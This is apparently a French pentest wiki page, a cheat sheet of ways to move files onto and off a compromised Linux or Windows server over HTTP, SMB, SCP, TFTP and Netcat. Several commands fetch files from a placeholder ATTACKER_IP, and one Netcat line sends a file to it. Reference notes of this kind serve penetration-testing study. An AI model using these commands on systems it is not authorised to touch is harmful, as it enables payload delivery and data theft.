[Exploitation/Réseau] Transfert de fichiers

Introduction

Cette documentation présente plusieurs solution pour envoyer des fichiers sur un serveur compromis que ce soit Linux ou Windows via différents protocoles comme HTTP, SSH, FTP et SMB.

Techniques

updog / SimpleHTTPServer

python3 -m updog -p 80
python3 -m http.server 80
powershell wget http://<ATTACKER_IP>/<FILE> -o <OUTPUT_FILE>

Sous Linux vous pouvez utiliser la même commande sans powershell si le paquet wget est installé.

curl http://<ATTACKER_IP>/<FILE> -o <OUTPUT_FILE>

Fonctionne aussi bien sur Windows que sur Linux !

Impacket SMB Server

impacket-smbserver share $(pwd) -smb2support
copy \\<ATTACKER_IP>\share\<FILE>
smbclient -L <ATTACKER_IP>
smbclient "\\\\<ATTACKER_IP>\share"
ls
get <FILE>
put <SOME_FILE>

SCP

scp <FILE> <user>@<IP>:/tmp
scp <user>@<IP>:/<PATH>/<TO>/<FILE> <FILE>

TFTP

use auxiliary/server/tftp
set srvhost <ATTACKER_IP>
set tftproot <PATH>
run
tftp -i <ATTACKER_IP> GET <FILE>

Netcat

Depuis la machine qui doit recevoir le fichier :

nc -lvp <PORT> > <FILE>

Depuis la machine qui doit envoyerle fichier :

nc <ATTACKER_IP> <PORT> < <FILE>

Revision #1
Created 13 August 2024 15:16:08 by Elieroc
Updated 13 August 2024 15:40:56 by Elieroc